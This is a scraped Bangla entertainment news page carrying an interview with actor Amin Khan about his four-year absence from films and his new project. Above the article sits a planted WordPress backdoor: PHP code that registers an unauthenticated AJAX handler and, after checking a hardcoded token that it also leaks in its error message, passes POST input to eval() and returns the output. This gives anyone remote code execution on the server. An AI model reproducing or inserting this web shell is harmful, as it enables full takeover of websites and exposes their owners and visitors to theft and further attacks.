// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যে কারণে সিনেমা থেকে দূরে ছিলেন নায়ক আমিন খান | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeযে কারণে সিনেমা থেকে দূরে ছিলেন নায়ক আমিন খান

যে কারণে সিনেমা থেকে দূরে ছিলেন নায়ক আমিন খান

ঢাকাই সিনেমার একসময়ের জনপ্রিয় ও ব্যস্ত নায়ক আমিন খান অনেক দিন দূরে ছিলেন চলচ্চিত্র জগৎ থেকে। রুপালি পর্দায় তাকে দেখা যায়নি।

এতদিন কেন দূরে ছিলেন তিনি। দ্য ডেইলি স্টারের কাছে নিজেই শুনিয়েছেন এর পেছনের কারণ।

‘আমি আসলে মনের মতো চরিত্র ও গল্প পাচ্ছিলাম না,’ বলেন আমিন খান।

‘আমার কাছে নতুন নতুন সিনেমার প্রস্তাব এসেছে প্রচুর। কিন্তু, আমি রাজি হইনি। মনে ধরেনি। প্রস্তাব পাওয়ার পর মনে হয়েছে এসব চরিত্রে আগেও করেছি। ভিন্ন কিছু তো পাচ্ছি না। সেজন্য বেশ কয়েক বছর আমি সিনেমা থেকে দূরে ছিলাম,’ যোগ করেন এ নায়ক।

তিনি আরো বলেন, ‘দেখুন, সিনেমার জন্যই সারাদেশের মানুষ আমাকে চেনেন ও জানেন। একসময় অনেক কাজ করেছি। মানুষের প্রচুর ভালোবাসা পেয়েছি। দিন-রাত শুটিং নিয়ে ব্যস্ত থেকেছি। আমার সবচেয়ে ভালোবাসার জায়গা ঢাকাই সিনেমা। কিন্তু একটা সময় মনে হয়েছে সেভাবে ভালো গল্প ও চরিত্র পাচ্ছি না। তাই শুটিং থেকে দূরে ছিলাম।’

সম্প্রতি নতুন একটি সিনেমায় চুক্তিবদ্ধ হয়েছেন আমিন খান। সিনেমার নাম—গুলশানের চামেলি। পরিচালনা করছেন মোহাম্মদ ইকবাল। সামনেই শুটিং শুরু করবেন।

এ বিষয়ে আমিন খান বলেন, ‘গুলশানের চামেলি সিনেমায় আমি ভিন্ন একটি চরিত্রে অভিনয় করব। এই চরিত্রের গুরুত্ব অনেক। ভীষণ চ্যালেঞ্জিং একটি চরিত্র। বলতে পারি, তিনটি চরিত্র খুবই গুরুত্বপূর্ণ। তিনটি চরিত্র এখানে হিরো। আমার চরিত্রটি তার মধ্যে একটি। এ কারণে পরিচালকের কাছ থেকে প্রস্তাব পাওয়ার পর রাজি হয়েছি।’

আরেক প্রশ্নের উত্তরে তিনি বলেন, ‘গুলশানের চামেলি সিনেমার শুটিং ভালোমতো সম্পন্ন হোক। আশা করছি দর্শকরা ভালো কিছু পাবেন। আমার বিশ্বাস দর্শকরা আমাকে নতুনভাবে দেখতে পাবেন। বড় কথা হচ্ছে অনেক বছর পর যেন চ্যালেঞ্জ নিয়ে কাজটি সুন্দরভাবে করতে পারি।’

তিনি বলেন, ‘চার বছর ধরে আমি সিনেমা থেকে দূরে আছি। যদি সেভাবে আমাকে গল্প ও চরিত্র দেওয়া হয়, তাহলে আগামীতে আরও নতুন কাজে দেখা যেতে পারে।’

অন্যদিকে, সম্প্রতি তিনি একটি গান লিখেছেন। এটি তার লেখা প্রথম গান। গানটির মিউজিক ভিডিও প্রকাশ হয়েছে। যেখানে তিনি নিজেই মডেল হয়েছেন।

আমিন খান বলেন, ‘অল্প অল্প লেখালেখির অভ্যাস আছে। গানটি অনেকেই পছন্দ করেছেন। তবে, আমি কিন্তু বিজ্ঞাপণের জন্য প্রচুর স্ক্রিপ্ট লিখেছি।’

সিনেমা নিয়ে কী ধরনের স্বপ্ন দেখেন—জানতে চাইলে আমিন খান বলেন, ‘১৯৯৬ সালের দিকে ঢাকাই সিনেমার যেমন জমজমাট অবস্থা ছিল, সেই অবস্থায় দেখতে চাই। এই স্বপ্ন কবে পূরণ হবে জানি না। কিন্তু, আমি স্বপ্ন দেখি।’

ঢাকাই সিনেমার বড় সংকট কী—প্রশ্নের উত্তরে তিনি বলেন, ‘নেতৃত্বের সংকট। কে কীভাবে নেবেন জানি না। আমি মনে করি সঠিকভাবে নেতৃত্ব দিতে পারলে আমরা অনেক দূর যেতে পারতাম, অনেক ভালো কিছু করা সম্ভব হতো। কিন্তু, আমরা পারিনি।’

তিনি বলেন, ‘শুটিং থেকে দূরে ছিলাম কিন্তু শুটিং খুব মিস করেছি। অ্যাকশন শব্দ খুব মিস করেছি। কোথাও যাওয়ার সময় যদি রাস্তার পাশে শুটিং দেখতে পেতাম তাহলে গাড়ি থামিয়ে দাঁড়াতাম। পরিচিত কেউ থাকলে কথা বলতাম। পরিচিত কেউ না থাকলে দূর থেকে দাঁড়িয়ে একটু সময় দেখতাম। আর ভাবতাম এই জগৎ তো আমারই।’

একটি মধুর স্মৃতিও শোনান আমিন খান, ‘একবার কোথাও যাচ্ছি। হঠাৎ আমার ছেলে কিছু গান ছেড়ে দেয়। গানগুলো ছিল আমার সিনেমার। যে গানগুলো একসময় তুমুল জনপ্রিয়তা পেয়েছিল। ছেলে যখন গানগুলো ছেড়ে দেয়, আমার মধ্যে এক ধরনের ভালো লাগা কাজ করে। মন ভালো হয়ে যায়।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments